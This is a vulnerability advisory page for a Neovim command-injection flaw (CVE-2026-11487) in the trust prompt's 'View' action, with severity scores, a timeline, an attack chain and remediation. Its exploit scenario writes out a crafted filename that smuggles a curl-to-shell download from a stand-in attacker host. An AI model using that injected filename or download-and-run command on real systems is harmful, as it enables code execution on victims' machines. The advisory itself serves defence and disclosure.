Skip to main content

Neovim EUVD-2026-35018

| CVE-2026-11487 LOW
Command Injection (CWE-77)
2026-06-08 VulDB GHSA-6869-x4fx-m53f
Command Injection Neovim
1.9
CVSS 4.0 · NVD

Severity by source

NVD PRIMARY
1.9 LOW
CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X

Primary rating from NVD · only source for this CVE.

CVSS VectorNVD

CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
Attack Vector
Local
Attack Complexity
Low
Privileges Required
Low
User Interaction
None
Scope
X

Lifecycle Timeline

4
Severity Changed
Jun 08, 2026 - 05:22 NVD
MEDIUM LOW
CVSS changed
Jun 08, 2026 - 05:22 NVD
5.3 (MEDIUM) 1.9 (LOW)
Source Code Evidence Fetched
Jun 08, 2026 - 05:18 vuln.today
Analysis Generated
Jun 08, 2026 - 05:18 vuln.today

DescriptionCVE.org

A flaw has been found in Neovim up to 0.12.2. Affected by this issue is the function M.read of the file runtime/lua/vim/secure.lua of the component View Branch. Executing a manipulation of the argument path can lead to command injection. It is possible to launch the attack on the local host. The exploit has been published and may be used. This patch is called f83e0dcaf8cf18de94828341b0a1a61a86c75baf. A patch should be applied to remediate this issue.

AnalysisAI

Command injection in Neovim up to version 0.12.2 allows a local attacker with low privileges to execute arbitrary Vim commands by crafting a file with a malicious name containing pipe (|) or other Vim Ex command separators. The vulnerable code path is the M.read function in runtime/lua/vim/secure.lua, which concatenates an unsanitized file path directly into a vim.cmd('sview ...') call when a user selects the 'View' action in Neovim's security trust prompt. …

Unlock full vulnerability intelligence

  • Risk assessment & exploitation conditions
  • Attack chain visualization
  • Remediation with exact patch versions
  • Threat intelligence from 22 sources
  • Personal watchlist & email alerts
Continue with Google Continue with GitHub

Free forever · No credit card required

Attack ChainAIDerived

Hypothetical attack flow derived from CVE metadata

Recon
Attacker writes maliciously-named file with `|` to shared directory
Delivery
Victim opens Neovim in affected directory
Exploit
`vim.secure.read()` prompts user with trust dialog
Install
Victim selects 'View' option
C2
Unsanitized fullpath concatenated into `vim.cmd('sview ...')`
Execute
Pipe separator causes injected Ex command to execute
Impact
Arbitrary Vim commands (and optionally shell commands via `:!`) run as victim user
Sign in to reveal

Vulnerability AssessmentAI

Exploitation Exploitation requires the attacker to have write access to a filesystem path that will be encountered by the victim's Neovim session - for example, a shared project directory, a repository the victim clones, or any path from which Neovim triggers `vim.secure.read()` (such as directories containing `.nvimrc` or `.exrc` files). … Additional conditions and limiting factors are described in the full assessment.
Risk Assessment The CVSS 3.1 base score of 5.3 (Medium) with vector AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L accurately captures a locally-exploitable, low-complexity attack requiring only standard user privileges with bounded CIA impact. … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in.
Exploit Scenario An attacker with local user-level filesystem access creates a file named `legitimate-project-config|!curl attacker.com/shell.sh|sh` (or a simpler Vim command variant such as `Xfile|let g:pwned=1`) in a shared project directory or repository that a developer is likely to open with Neovim. When the developer opens Neovim in that directory and the `vim.secure.read()` prompt appears asking whether to trust the file, selecting 'View' - the ostensibly safe option - causes the unsanitized filename to be injected into `vim.cmd('sview ...')`, executing the appended Vim or shell commands with the developer's privileges. …
Remediation The primary remediation is to apply the upstream patch, which is available as commit `f83e0dcaf8cf18de94828341b0a1a61a86c75baf` merged via PR #39918 (https://github.com/neovim/neovim/pull/39918). … Detailed patch versions, workarounds, and compensating controls in full report.
Sign in to read full assessment

Threat intelligence, references, and detailed analysis are available after sign-in.

Share

EUVD-2026-35018 vulnerability details – vuln.today
Back

This site uses cookies essential for authentication and security. No tracking or analytics cookies are used. Privacy Policy